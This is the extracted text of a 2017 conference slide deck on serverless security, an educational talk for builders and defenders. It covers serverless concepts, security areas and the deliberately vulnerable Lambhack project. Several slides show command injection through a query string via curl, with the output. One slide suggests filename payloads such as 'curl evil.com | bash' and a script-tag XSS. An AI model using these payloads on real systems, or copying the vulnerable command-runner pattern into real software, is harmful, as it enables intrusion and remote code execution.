Serverless Security: A pragmatic primer for builders and defenders

1. Velocity San Jose 2017 @WICKETT SERVERLESS SECURITY: A PRAGMATIC PRIMER FOR BUILDERS AND DEFENDERS JAMES WICKETT

2. Velocity San Jose 2017 @WICKETT WANT THE SLIDES RIGHT NOW? Send an email to   james@signalsciences.com

3. Velocity San Jose 2017 @WICKETT ‣ DEVOPS DAYS AUSTIN ORGANIZER ‣ HEAD OF RESEARCH AT SIGNAL SCIENCES ‣ AUTHOR DEVOPS FUNDAMENTALS AT LYNDA.COM ‣ BLOGGER AT THEAGILEADMIN.COM AND LABS.SIGNALSCIENCES.COM JAMES WICKETT

4. Velocity San Jose 2017 @WICKETT Don’t worry, this is not a thinly veiled vendor pitch.

5. Velocity San Jose 2017 @WICKETT ‣ SERVERLESS ENCOURAGES FUNCTIONS AS DEPLOY UNITS, COUPLED WITH THIRD PARTY SERVICES THAT ALLOW RUNNING END-TO-END APPLICATIONS WITHOUT WORRYING ABOUT SYSTEM OPERATION. ‣ NEW SERVERLESS PATTERNS ARE JUST EMERGING ‣ SECURITY WITH SERVERLESS IS EASIER ‣ SECURITY WITH SERVERLESS IS HARDER CONCLUSION (1 OF 2)

6. Velocity San Jose 2017 @WICKETT ‣ FOUR KEY AREAS APPLY TO SERVERLESS SECURITY ‣ SOFTWARE SUPPLY CHAIN SECURITY ‣ DELIVERY PIPELINE SECURITY ‣ DATA FLOW SECURITY ‣ ATTACK DETECTION ‣ LAMBHACK! A VERY VULNERABLE LAMBDA STACK OPEN SOURCE PROJECT ‣ GITHUB.COM/WICKETT/LAMBHACK CONCLUSION (2 OF 2)

7. Velocity San Jose 2017 @WICKETT WHAT IS SERVERLESS?

8. Velocity San Jose 2017 @WICKETT MISCONCEPTIONS

9. Velocity San Jose 2017 @WICKETT IT’S MARKETING (CLOUD REBRANDED)

10. Velocity San Jose 2017 @WICKETT SERVERLESS == NO SERVERS

11. Velocity San Jose 2017 @WICKETT SERVERLESS == BACKEND AS A SERVICE

12. Velocity San Jose 2017 @WICKETT SERVERLESS == PLATFORM AS A SERVICE

13. Velocity San Jose 2017 @WICKETT TK: ADRIANCO QUOTE

14. Velocity San Jose 2017 @WICKETT SO, WHAT IS SERVERLESS?

15. Velocity San Jose 2017 @WICKETT http://martinfowler.com/articles/serverless.html @MIKEBROBERTS

16. Velocity San Jose 2017 @WICKETT

17. Velocity San Jose 2017 @WICKETT ‣ 2012 - USED TO DESCRIBE BAAS AND CONTINUOUS INTEGRATION SERVICES RUN BY THIRD PARTIES ‣ LATE 2014 - AWS LAUNCHED LAMBDA ‣ JULY 2015 - AWS LAUNCHED API GATEWAY ‣ OCTOBER 2015 - AWS RE:INVENT - THE SERVERLESS COMPANY USING AWS LAMBDA ‣ 2015 TO PRESENT - FRAMEWORKS FORMING ‣ 2016 - GOOGLE CLOUD FUNCTIONS, AZURE FUNCTIONS RELEASED ‣ 2016 - SERVERLESS CONFERENCES STARTED HISTORY OF SERVERLESS

18. Velocity San Jose 2017 @WICKETT VMsHardware Serverless Inspiration from @adrianco Waste Value

19. Velocity San Jose 2017 @WICKETT Decomposed Microservice Architecture

20. Velocity San Jose 2017 @WICKETT WHAT CAN WE SAY IS SERVERLESS?

21. Velocity San Jose 2017 @WICKETT SERVERLESS IS FUNCTIONS AS A SERVICE (FaaS)

22. Velocity San Jose 2017 @WICKETT CONTAINERS ON DEMAND

23. Velocity San Jose 2017 @WICKETT SERVERLESS IS (NO MANAGEMENT OF) SERVERS

24. Velocity San Jose 2017 @WICKETT SERVERLESS IS SERVICEFULL

25. Velocity San Jose 2017 @WICKETT SERVERLESS IS AN OPINIONATED FRAMEWORK FOR COMPUTE AND CONTAINERS

26. Velocity San Jose 2017 @WICKETT If you want to lead your company bravely into the new world, you would do well to focus lot on how serverless will evolve. - @Cloudopinion https://medium.com/ @cloud_opinion/the-pattern- may-repeat-26de1e8b489d

27. Velocity San Jose 2017 @WICKETT THE CLOUD WAS TO VIRTUALIZATION AS SERVERLESS WILL BE TO CONTAINERS

28. Velocity San Jose 2017 @WICKETT Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation. SERVERLESS DEFINITION

29. Velocity San Jose 2017 @WICKETT SO, WHAT ARE THE UPSIDES?

30. Velocity San Jose 2017 @WICKETT SCALING BUILT IN

31. Velocity San Jose 2017 @WICKETT PAY FOR WHAT YOU USE IN 100MS INCREMENTS

32. Velocity San Jose 2017 @WICKETT WITH SERVERLESS SYSTEM ADMINISTRATION IS (MOSTLY) LOWER

33. Velocity San Jose 2017 @WICKETT SHORT CIRCUITS OPS AND MOVES INFRASTRUCTURE RUNTIME CLOSER TO DEVS

34. Velocity San Jose 2017 @WICKETT YOU CAN SKIP DOCKERING ALL THE THINGS!

35. Velocity San Jose 2017 @WICKETT GREAT, WHAT’S THE CATCH?

36. Velocity San Jose 2017 @WICKETT Ops burden to rationalize serverless model @patrickdebois

38. Velocity San Jose 2017 @WICKETT VENDOR LOCK-IN

39. Velocity San Jose 2017 @WICKETT MONITORING

40. Velocity San Jose 2017 @WICKETT LOGGING

41. Velocity San Jose 2017 @WICKETT RELIABILITY

42. Velocity San Jose 2017 @WICKETT ‣ APP NEEDS LARGE LOCAL DISK SPACE ‣ LONG RUNNING JOBS ‣ BIG I/O TASKS ‣ LATENCY SENSITIVE REQUESTS THAT CAN’T WAIT FOR THE COLD-STARTUP TIME SERVERLESS DEAL KILLERS (PROBABLY)

43. Velocity San Jose 2017 @WICKETT SERVERLESS USE CASES

44. Velocity San Jose 2017 @WICKETT http://martinfowler.com/articles/serverless.html MESSAGE PROCESSING

45. Velocity San Jose 2017 @WICKETT http://martinfowler.com/articles/serverless.html API GATEWAY

46. Velocity San Jose 2017 @WICKETT WEB APPLICATIONS

47. Velocity San Jose 2017 @WICKETT CI/CD auth wordpress scraper event ingestion chatbots load testing MORE SERVERLESS USE CASES

48. Velocity San Jose 2017 @WICKETT Security

49. Velocity San Jose 2017 @WICKETT LETS TRY A SAMPLE APPLICATION IN AWS

50. Velocity San Jose 2017 @WICKETT ‣ SERVERLESS ‣ APEX ‣ GO SPARTA ‣ KAPPA STEP 1: PICK A FRAMEWORK

52. Velocity San Jose 2017 @WICKETT ‣ GOLANG! ‣ AWS LAMBDA SUPPORTS BRING YOUR OWN BINARY ‣ SPARTA WRAPS YOUR COMPILED BINARY WITH A NODE.JS SHIM ‣ GO SPARTA ALSO HANDLES ALL THE OTHER AWS SERVICES YOUR APP CONSUMES GO SPARTA

53. Velocity San Jose 2017 @WICKETT ‣ CLOUDWATCH EVENTS AND LOGS ‣ DYNAMODB, KINESIS, ‣ S3 ‣ SES, SNS ‣ API GATEWAY CREATION GO SPARTA INCLUDES

54. Velocity San Jose 2017 @WICKETT ‣ BUILD A WORD CLOUD GENERATOR ‣ ABLE TO CONSUME 3RD PARTY APIS FOR TEXT SOURCES ‣ RETURN JSON WITH COUNTS OF WORDS IN TEXT ‣ KEEP IT SIMPLE STEP 2: IDEA!

55. Velocity San Jose 2017 @WICKETT ‣ (USING GO SPARTA FOR THE FRAMEWORK) ‣ LAMBDA ‣ S3 ‣ API GATEWAY STEP 3: DESIGN AND ARCHITECTURE

57. Velocity San Jose 2017 @WICKETT STEP 4: WRITE THE HANDLER

58. Velocity San Jose 2017 @WICKETT STEP 5: SETUP API GATEWAY

59. Velocity San Jose 2017 @WICKETT STEP 6: SET THE CONFIG DETAILS

60. Velocity San Jose 2017 @WICKETT STEP 7: PROVISION YOUR APP!

61. Velocity San Jose 2017 @WICKETT STEP 8: SETUP STRICT IAM POLICIES

62. Velocity San Jose 2017 @WICKETT STEP 9: GIVE UP AND SET LOOSE IAM POLICIES, PROMISE TO FIX LATER

63. Velocity San Jose 2017 @WICKETT STEP 10: PROVISION YOUR APP!

64. Velocity San Jose 2017 @WICKETT APP IN AWS CONSOLE

65. Velocity San Jose 2017 @WICKETT TEST LAMBDA EXEC IN CONSOLE FIRST RUN OF 343MS

66. Velocity San Jose 2017 @WICKETT SECOND RUN ONLY TOOK 84MS

67. Velocity San Jose 2017 @WICKETT API GATEWAY IN CONSOLE

68. Velocity San Jose 2017 @WICKETT API GATEWAY EXECUTION IN CONSOLE

69. Velocity San Jose 2017 @WICKETT RETURNED JSON

70. Velocity San Jose 2017 @WICKETT MONITORING LAMBDA IN CONSOLE

71. Velocity San Jose 2017 @WICKETT WHAT I LEARNED ABOUT SERVERLESS SECURITY

72. Velocity San Jose 2017 @WICKETT SECURITY

74. Velocity San Jose 2017 @WICKETT ‣ SECURE SOFTWARE SUPPLY CHAIN ‣ DELIVERY PIPELINE ‣ DATA FLOW SECURITY ‣ ATTACK DETECTION FOUR AREAS OF SERVERLESS SECURITY

75. Velocity San Jose 2017 @WICKETT source: @devsecops

76. Velocity San Jose 2017 @WICKETT ‣ THE CODE YOU WRITE (AND LIBS) IS YOUR SURFACE AREA NOW ‣ CHANGE FROM THE PAST (E.G. SHELLSHOCK, HEARTBLEED) OF THE NUMEROUS FIREDRILLS OUR INDUSTRY HAD TO ENDURE DUE TO INHERITANCE SURFACE AREA REDUCTION

77. Velocity San Jose 2017 @WICKETT ‣ TLS CONTROL TO THE PROVIDER ‣ ROUTING CONTROL TO THE PROVIDER ‣ CONSUMPTION OF THIRD PARTY SERVICES ‣ IAM ROLES AND POLICY CONFUSION SURFACE AREA EXPANSION

78. Velocity San Jose 2017 @WICKETT SSL / TLS FROM THE PROVIDER

79. Velocity San Jose 2017 @WICKETT OLD WAY NEW WAY

80. Velocity San Jose 2017 @WICKETT ROUTING FROM THE PROVIDER

81. Velocity San Jose 2017 @WICKETT ROUTING THE OLD WAY

82. Velocity San Jose 2017 @WICKETT ROUTING THE NEW WAY

83. Velocity San Jose 2017 @WICKETT Lambda + s3 + kinesis + DynamoDB + cloudformation + API Gateway + Auth0 SERVICE AND 3RD PARTY EXPANSION

84. Velocity San Jose 2017 @WICKETT https://media.ccc.de/v/33c3-7865- gone_in_60_milliseconds IAM ROLES AND POLICIES

85. Velocity San Jose 2017 @WICKETT Recommendation: Use a third-party service to monitor for provider conﬁg changes

86. Velocity San Jose 2017 @WICKETT ‣ DISABLE ROOT ACCESS KEYS ‣ MANAGE USERS WITH PROFILES ‣ SECURE YOUR KEYS IN YOUR DEPLOY SYSTEM ‣ SECURE KEYS IN DEV SYSTEM ‣ USE PROVIDER MFA USE GOOD HYGIENE WITH YOUR PROVIDER

87. Velocity San Jose 2017 @WICKETT DELIVERY PIPELINE SECURITY

89. Velocity San Jose 2017 @WICKETT UNIT TESTING

90. Velocity San Jose 2017 @WICKETT EASIER TO MOCK HARDER TO MOCK

91. Velocity San Jose 2017 @WICKETT UNIT TESTING EVEN MORE CRITICAL AS INTEGRATION TESTING IN DEV IS HARDER

92. Velocity San Jose 2017 @WICKETT ‣ USE OF A STAGING OR PRE-PROD ENV ‣ END TO END SYNTHETIC INTEGRATION TESTS ‣ ALL THE USUAL SUSPECTS INTEGRATION TESTING

93. Velocity San Jose 2017 @WICKETT CONFIGURATION IS PART OF DELIVERY

94. Velocity San Jose 2017 @WICKETT ‣ ONLY DEV KEYS CAN PUSH TO ‘DEV’ ‣ ONLY BUILD/DEPLOY SYSTEM CAN PUSH TO PRE- PROD ‣ INTEGRATION TESTS MUST PASS IN THIS ENV ‣ SECURITY VALIDATION MUST TAKE PLACE BEFORE PROMOTION ‣ ALLOW PUSH TO PROD, ONLY BY DEPLOY SYSTEM GOOD PIPELINE PRACTICES

95. Velocity San Jose 2017 @WICKETT ‣ BDD-SECURITY - GITHUB.COM/ CONTINUUMSECURITY/BDD-SECURITY ‣ GAUNTLT - GAUNTLT.ORG ‣ GITHUB.COM/GAUNTLT/GAUNTLT ‣ DOCKER RECOMMENDED SECURITY TESTING TOOLS

96. Velocity San Jose 2017 @WICKETT http://www.slideshare.net/wickett/pragmatic-security-and-rugged-devops-sxsw-2015 GAUNTLT WORKSHOP IN 9 EXAMPLES

97. Velocity San Jose 2017 @WICKETT DATA FLOW ‣ DEVELOPMENT ‣ DATA FLOW DIAGRAMS ‣ THREAT MODELING ‣ RUNTIME ‣ LOGGING ‣ CUSTOM MONITORS/ METRICS

98. Velocity San Jose 2017 @WICKETT Your provider is responsible for the underlying infrastructure and services. You are responsible for ensuring you use the services in a secure manner. https://read.acloud.guru/adopting- serverless-architectures-and- security-254a0c12b54a

99. Velocity San Jose 2017 @WICKETT ‣ SPOOFING CONSUMED RESOURCES ‣ DENIAL OF SERVICE ‣ TIMEOUTS ‣ EXECUTION RESTRICTIONS FOR RESOURCES ‣ CAPACITY ISSUES DATA FLOW SECURITY

100. Velocity San Jose 2017 @WICKETT ATTACK DETECTION

101. Velocity San Jose 2017 @WICKETT DOES APPLICATION SECURITY STILL MATTER?

102. Velocity San Jose 2017 @WICKETT https://medium.com/ @PaulDJohnston/security-and- serverless-ec52817385c4

104. Velocity San Jose 2017 @WICKETT APPSEC GREATEST HITS (XSS, SQLI, CMDEXE) STILL RELEVANT 15 YEARS LATER!

105. Velocity San Jose 2017 @WICKETT ‣ SERVERLESS HAS A FALSE SENSE OF SECURITY ‣ API PROXY LAYER THING PROTECTS ME, RIGHT? ;) ‣ WANTED TO SEE MAKE THE POINT THAT APPSEC IS RELEVANT IN SERVERLESS ‣ A VULNERABLE LAMBDA + API GATEWAY STACK ‣ BORN FROM THE HERITAGE OF WEBGOAT, RAILS GOAT, GRUYERE, AND OTHERS… INTRODUCING LAMBHACK

106. Velocity San Jose 2017 @WICKETT ‣ A VULNERABLE LAMBDA + API GATEWAY STACK ‣ OPEN SOURCE, MIT LICENSED ‣ INCLUDES ARBITRARY CODE EXECUTION IN A QUERY STRING ‣ MORE WORK NEEDED, PULL REQUESTS ACCEPTED AND LOOKING FOR COMMUNITY HELP ‣ GITHUB.COM/WICKETT/LAMBHACK github.com/wickett/lamback

107. Velocity San Jose 2017 @WICKETT lambhack is a vulnerable serverless lambda application It would certainly be a bad idea to base any coding patterns oﬀ what you see here.

109. Velocity San Jose 2017 @WICKETT BAD CODE IS BAD CODE  EVEN IN SERVERLESS… command := lambdaEvent.QueryParams[“args"] output := runner.Run(command)

110. Velocity San Jose 2017 @WICKETT With command execution available to us in lambhack, we can poke around the container a bit

111. Velocity San Jose 2017 @WICKETT UNAME -A $ curl “https://XXXX.execute-api.us- east-1.amazonaws.com/prod/lambhack/c?args=uname+-a; +sleep+1" > Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

112. Velocity San Jose 2017 @WICKETT CAT /PROC/VERSION $ curl “https://XXXX.execute-api.us- east-1.amazonaws.com/prod/lambhack/c?args=cat+/proc/ version;+sleep+1” > Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016

113. Velocity San Jose 2017 @WICKETT LET’S LOOK IN /TMP $ curl “https://XXXX.execute-api.us- east-1.amazonaws.com/prod/lambhack/c?args=ls+-la+/tmp; +sleep+1" total 17916 drwx------ 2 sbx_user1056 490 4096 Feb 8 22:02 . drwxr-xr-x 21 root root 4096 Feb 8 21:47 .. -rwxrwxr-x 1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64

114. Velocity San Jose 2017 @WICKETT LAMBDA REUSE IN ACTION! $ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/ prod/lambhack/c?args=ls+/tmp;+sleep+1" $ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/ prod/lambhack/c?args=touch+/tmp/wickettfile;+sleep+1” $ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/ prod/lambhack/args=ls+/tmp;+sleep+1" > Sparta.lambda.amd64 wickettfile

115. Velocity San Jose 2017 @WICKETT WHICH CURL $ curl “https://XXXX.execute-api.us- east-1.amazonaws.com/prod/lambhack/c? args=which+curl;+sleep+1" > /usr/bin/curl

116. Velocity San Jose 2017 @WICKETT ‣ ADD XSS ‣ ADD OTHER INJECTION ATTACKS ‣ ADD AUTH VECTORS ‣ … ‣ PULL REQUESTS ACCEPTED :) FUTURE OF LAMBHACK

117. Velocity San Jose 2017 @WICKETT ‣ LAMBDA HAS LIMITED BLAST RADIUS, BUT NOT ZERO ‣ MONITORING/LOGGING PLAYS A KEY ROLE HERE ‣ DETECT LONGER RUN TIMES ‣ HIGHER ERROR RATE OCCURRENCES ‣ DATA INGESTION ‣ LOG ACTIONS OF LAMBDAS APPSEC THOUGHTS

118. Velocity San Jose 2017 @WICKETT APPLICATION SECURITY IS STILL RELEVANT

119. Velocity San Jose 2017 @WICKETT ‣ New surface area, similar appsec problems ‣ Command Exec ‣ XSS ‣ Injection Attacks ‣ Try new things, e.g. appending ‘curl evil.com | bash’ or <script>alert(1)</script> to a ﬁlename you upload on s3 TYPES OF ATTACKS

120. Velocity San Jose 2017 @WICKETT ‣ LOGGING, EMITTING EVENTS ‣ USAGE METRICS ‣ VANDIUM (SQLI) WRAPPER ‣ CONTENT SECURITY POLICY (CSP) ‣ MORE THINGS NEED TO BE DONE HERE… DEFENSE

121. Velocity San Jose 2017 @WICKETT Development in serverless is easier than ever, attracting new developers to web development, as a result, application security will see a rise. FINAL THOUGHT

123. Velocity San Jose 2017 @WICKETT ‣ SERVERLESS ENCOURAGES FUNCTIONS AS DEPLOY UNITS, COUPLED WITH THIRD PARTY SERVICES THAT ALLOW RUNNING END-TO-END APPLICATIONS WITHOUT WORRYING ABOUT SYSTEM OPERATION. ‣ NEW SERVERLESS PATTERNS ARE JUST EMERGING ‣ SECURITY WITH SERVERLESS IS EASIER ‣ SECURITY WITH SERVERLESS IS HARDER CONCLUSION (1 OF 2)

124. Velocity San Jose 2017 @WICKETT ‣ FOUR KEY AREAS APPLY TO SERVERLESS SECURITY ‣ SOFTWARE SUPPLY CHAIN SECURITY ‣ DELIVERY PIPELINE SECURITY ‣ DATA FLOW SECURITY ‣ ATTACK DETECTION ‣ LAMBHACK! A VERY VULNERABLE LAMBDA STACK OPEN SOURCE PROJECT ‣ GITHUB.COM/WICKETT/LAMBHACK CONCLUSION (2 OF 2)

125. Velocity San Jose 2017 @WICKETT WANT THE SLIDES RIGHT NOW OR HAVE QUESTIONS? Send an email to   james@signalsciences.com

Serverless Security: A pragmatic primer for builders and defenders

James Wickett

Serverless Security: A pragmatic primer for builders and defenders